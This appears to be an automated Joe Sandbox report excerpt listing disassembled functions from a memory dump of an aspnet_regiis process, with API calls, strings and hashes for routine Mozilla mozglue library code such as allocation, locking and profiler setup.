                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1910681409-0
                                                                                                                                                                    • Opcode ID: 28e147eefbbdaa24288719b5d3ad1fb6b2799dcc64aefd4e0b46592041295dde
                                                                                                                                                                    • Instruction ID: 875f7a00131a9cb6f79056402e111c2f1e8a6dd672167942cd32042ea1ee0836
                                                                                                                                                                    • Opcode Fuzzy Hash: 28e147eefbbdaa24288719b5d3ad1fb6b2799dcc64aefd4e0b46592041295dde
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D014F717042079BDB20DF1AE94AA867BF9EBA332D7244235E429D2A11D7319915CFC1
                                                                                                                                                                    Function 6C7E7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7E75C4,?), ref: 6C7E762B
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7644
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E765A
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7663
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7677
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 418114769-0
                                                                                                                                                                    • Opcode ID: 492ca0caa3a5a753a1b6297b916f3175685c351800e4c5f3faef68b1de961a96
                                                                                                                                                                    • Instruction ID: cbceac5bf819e7d85b1498f17a1a96028c33b1017e459808e55b2817b3cf1e30
                                                                                                                                                                    • Opcode Fuzzy Hash: 492ca0caa3a5a753a1b6297b916f3175685c351800e4c5f3faef68b1de961a96
                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0C8B1E10746ABD7008F61C849675B7B8FFEA259F114326F90443B01E7B1A5D1C7D0
                                                                                                                                                                    Function 6C7F1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F1800
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                    • API String ID: 46770647-1733325692
                                                                                                                                                                    • Opcode ID: dd6c2a164a0e97fdb85873909403095c353d1e5278f5e7e34bb0a40354ac8eeb
                                                                                                                                                                    • Instruction ID: 2dba9dd66c50f5a5bd529b7d7c596754eead22e6f8ee047a8acc7e9c848c3d2c
                                                                                                                                                                    • Opcode Fuzzy Hash: dd6c2a164a0e97fdb85873909403095c353d1e5278f5e7e34bb0a40354ac8eeb
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D71F3B0A003469FC714CF28D69869ABBF5FF45314F00466DE8295BF41D770A699CBE2
                                                                                                                                                                    Function 6C7BD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD4F2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD50B
                                                                                                                                                                      • Part of subcall function 6C79CFE0: EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                      • Part of subcall function 6C79CFE0: LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD52E
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD690
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD751
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    • API String ID: 3805649505-2608361144
                                                                                                                                                                    • Opcode ID: 4172a1a7f04899009f53c06c00f7b0b2dfe1bbebaf6eaa669eb97c8a926200cf
                                                                                                                                                                    • Instruction ID: e6d45f0518abe40934da5869cb16db57201667baee964aa0e702349b22aec22a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4172a1a7f04899009f53c06c00f7b0b2dfe1bbebaf6eaa669eb97c8a926200cf
                                                                                                                                                                    • Instruction Fuzzy Hash: A951D271A047028FD324CF28C29865AB7E1EB99318F54493ED599D7F89D770E804CB96
                                                                                                                                                                    Function 6C7E4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                    • API String ID: 3732870572-2661126502
                                                                                                                                                                    • Opcode ID: d33e0de9cb1b47ed894f7550fc0179d3adc6439e664cd262a13af33e06bcb3c3
                                                                                                                                                                    • Instruction ID: 03ca303fa73efbb2a4d6a444e269415f7b065b4e075fee889fa8c5732c78ce55
                                                                                                                                                                    • Opcode Fuzzy Hash: d33e0de9cb1b47ed894f7550fc0179d3adc6439e664cd262a13af33e06bcb3c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 19415572B047089FCB08DFB9D95515EBBE5EB89348F10863EE855ABB41EB309804C782
                                                                                                                                                                    Function 6C7E46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7E4721
                                                                                                                                                                      • Part of subcall function 6C794410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C7D3EBD,00000017,?,00000000,?,6C7D3EBD,?,?,6C7942D2), ref: 6C794444
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                    • API String ID: 680628322-2661126502
                                                                                                                                                                    • Opcode ID: 0e74658b4294650cfa907cd632e7fc57c2e4d7717849f9a6009f74464c4e08b4
                                                                                                                                                                    • Instruction ID: b3041774029fcb3e34a1391a06a094d5ba7498538d6b66e1ad64f03e06a54ed0
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e74658b4294650cfa907cd632e7fc57c2e4d7717849f9a6009f74464c4e08b4
                                                                                                                                                                    • Instruction Fuzzy Hash: C5312672F042085FCB08CFBDD99529EBBE6EB9C314F55853EE8059BB41EB7498048B90
                                                                                                                                                                    Function 6C7EB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7EB127), ref: 6C7EB463
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7EB4C9
                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C7EB4E4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                    • Opcode ID: 4deb10f1301564a8f6a9b2f0465ae6ce20997a13df271e498653e5fc0691463e
                                                                                                                                                                    • Instruction ID: 8fd9c7dba853e38234dffe0cd5668c6d5d207338b58cbdc3dab8550f86c86c5c
                                                                                                                                                                    • Opcode Fuzzy Hash: 4deb10f1301564a8f6a9b2f0465ae6ce20997a13df271e498653e5fc0691463e
                                                                                                                                                                    • Instruction Fuzzy Hash: BB310732A013099FDB10DFA9DA84AEEBBB5FF4A318F540539D82167A41D731B845CBE1
                                                                                                                                                                    Function 6C7DE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DE577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DE584
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DE5DE
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7DE8A6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                    • API String ID: 1483687287-53385798
                                                                                                                                                                    • Opcode ID: a42287ca0669e621cd50f7b6aab9e0d396a12c9d7ff4bd576b5f4de5cef2b3e6
                                                                                                                                                                    • Instruction ID: 79eed07f5852e77e088b31a83fd09284bf8874da018f313ac2d238dd0f396eba
                                                                                                                                                                    • Opcode Fuzzy Hash: a42287ca0669e621cd50f7b6aab9e0d396a12c9d7ff4bd576b5f4de5cef2b3e6
                                                                                                                                                                    • Instruction Fuzzy Hash: A711E13160425ADFCB20DF16C94AA6AFBF4FB9936CF410A28E84647F40C770A804CBD1
                                                                                                                                                                    Function 6C7E0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E0CD5
                                                                                                                                                                      • Part of subcall function 6C7CF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7CF9A7
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E0D40
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DCB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DDD
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DF2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                    • Opcode ID: 21fcdf366bc2b6ebfc95b11c9ff5bff236859424bc7c5b8dbf826a3d68b42a14
                                                                                                                                                                    • Instruction ID: f5a1b5834b4901808d1c18c4f792e04793c58c8d0d35a9fb601ba65c93ad2b41
                                                                                                                                                                    • Opcode Fuzzy Hash: 21fcdf366bc2b6ebfc95b11c9ff5bff236859424bc7c5b8dbf826a3d68b42a14
                                                                                                                                                                    • Instruction Fuzzy Hash: 61414C71A087808BD320CF29C68179EFBE5BFC9754F518A2EE8D887711DB70A445CB82
                                                                                                                                                                    Function 6C7ECCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECDA4
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                      • Part of subcall function 6C7ED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C7ECDBA,00100000,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED158
                                                                                                                                                                      • Part of subcall function 6C7ED130: InitializeConditionVariable.KERNEL32(00000098,?,6C7ECDBA,00100000,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED177
                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECDC4
                                                                                                                                                                      • Part of subcall function 6C7E7480: ReleaseSRWLockExclusive.KERNEL32(?,6C7F15FC,?,?,?,?,6C7F15FC,?), ref: 6C7E74EB
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECECC
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                      • Part of subcall function 6C7DCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C7ECEEA,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000), ref: 6C7DCB57
                                                                                                                                                                      • Part of subcall function 6C7DCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C7DCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C7ECEEA,?,?), ref: 6C7DCBAF
                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED058
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                    • Opcode ID: 878f331c94cc6cfe26f6a7dae195a0eb2bc7263b7cf565deaa79994b3acec886
                                                                                                                                                                    • Instruction ID: ab89e100123472adada6793740c5994819ecb81997eb182e78fd5a7ebb2ee305
                                                                                                                                                                    • Opcode Fuzzy Hash: 878f331c94cc6cfe26f6a7dae195a0eb2bc7263b7cf565deaa79994b3acec886
                                                                                                                                                                    • Instruction Fuzzy Hash: FBD17176A04B069FD708CF28C580B99F7E1BF99308F05862DD8598B752EB31E955CBC1
                                                                                                                                                                    Function 6C7A1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7A17B2
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C7A18EE
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A1911
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7A194C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3725304770-0
                                                                                                                                                                    • Opcode ID: 52fddec07e8782d8b0c86baff3d6f4784655e7482d74b59000cd93ce6447e08a
                                                                                                                                                                    • Instruction ID: 9b0210907a4ae44b179f9a5b54262a6f2619754cf4cc5761ae33e960d077b495
                                                                                                                                                                    • Opcode Fuzzy Hash: 52fddec07e8782d8b0c86baff3d6f4784655e7482d74b59000cd93ce6447e08a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B81C470A11305DFEB08CFA8D9949AEBBB1FF89314F04462CE815AB755D730E845CBA2
                                                                                                                                                                    Function 6C7B5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                    • Opcode ID: d36a448bffb01140e8ca68bea5a8a6b9e9d423f0201b2a1411a8a401a2c6fba7
                                                                                                                                                                    • Instruction ID: 1d64ec5c442db8ccfb94e7a17715be4793389f8c1a8222934fe2ab0414f457a8
                                                                                                                                                                    • Opcode Fuzzy Hash: d36a448bffb01140e8ca68bea5a8a6b9e9d423f0201b2a1411a8a401a2c6fba7
                                                                                                                                                                    • Instruction Fuzzy Hash: 92516C71E0021A8FCF18CF68C996AAEBBB1BB95308F194629D815B7B51C7706D45CBD0
                                                                                                                                                                    Function 6C79CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79CEBD
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C79CEF5
                                                                                                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C79CF4E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
